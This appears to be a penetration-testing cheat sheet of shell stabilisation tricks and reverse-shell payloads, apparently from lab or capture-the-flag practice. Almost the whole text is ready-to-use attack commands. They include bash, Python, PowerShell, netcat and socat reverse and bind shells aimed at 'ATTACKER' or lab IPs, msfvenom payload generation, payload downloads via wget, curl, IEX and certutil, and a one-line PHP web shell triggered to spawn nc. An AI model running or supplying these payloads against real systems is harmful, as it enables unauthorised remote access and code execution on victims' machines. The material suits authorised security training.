Shell Stabilization (Linux)
nc
# Spawn TTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Export TERM
export TERM=xterm
# Background shell
CTRL+Z
# On attacker (Kali)
stty raw -echo; fg;
rlwrap nc
# Listener is using rlwrap
rlwrap nc -lvnp <port>
# Once connected:
CTRL+Z
stty raw -echo; fg
# This is often more stable for windows.Reverse Shell Payloads
Bash
bash -i >& /dev/tcp/ATTACKER/4444 0>&1
Python
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
Powershell oneliner
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"Netcat (traditional)
nc -e /bin/bash ATTACKER 4444
Netcat (no -e)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER 4444 >/tmp/f
socat
# note: socat needs to be on the box. comes in precompiled drops
# listener
socat TCP-L:<port> FILE:`tty`,raw,echo=0
# on attack box
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
encrypted socat reverse shell
# on attacker
# create self-signed cert
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
# generate pem file
cat shell.key shell.crt > shell.pem
# send command
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
# on victim
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash
encrypted socat bind shell
# on victim
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes
# on attacker
socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -PowerShell (Windows reverse)
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object Net.Sockets.TCPClient("ATTACKER",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}
msfvenom
# highly customizable - just example
msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port
# example
msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443named pipe
# bind shell
mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f
# reverse shell
mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/fPayload Delivery Methods
Python HTTP server (on attacker)
python3 -m http.server 80
Download from target
# Linux
wget http://ATTACKER/shell.sh
curl http://ATTACKER/shell.sh -o shell.sh
# Windows (PowerShell)
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"
# certutil (Windows)
certutil -urlcache -split -f http://ATTACKER/shell.exe shell.exe
Upload to target (if RCE or file write access)
echo "<?php system(\$_GET['cmd']); ?>" > shell.php
python3 -m http.server 80
# Trigger: http://target/shell.php?cmd=whoami
Interactive Shell Boosters
# rlwrap (better interaction)
rlwrap nc -lvnp 4444
# socat reverse shell (more stable than netcat)
# Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Target:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:4444
Web Shell
nv -nvlp 6666
# upload web.shell.php
# hit:
http://10.10.82.227/uploads/web.shell.php?cmd=nc%2010.10.140.73%206666%20-e%20/bin/bash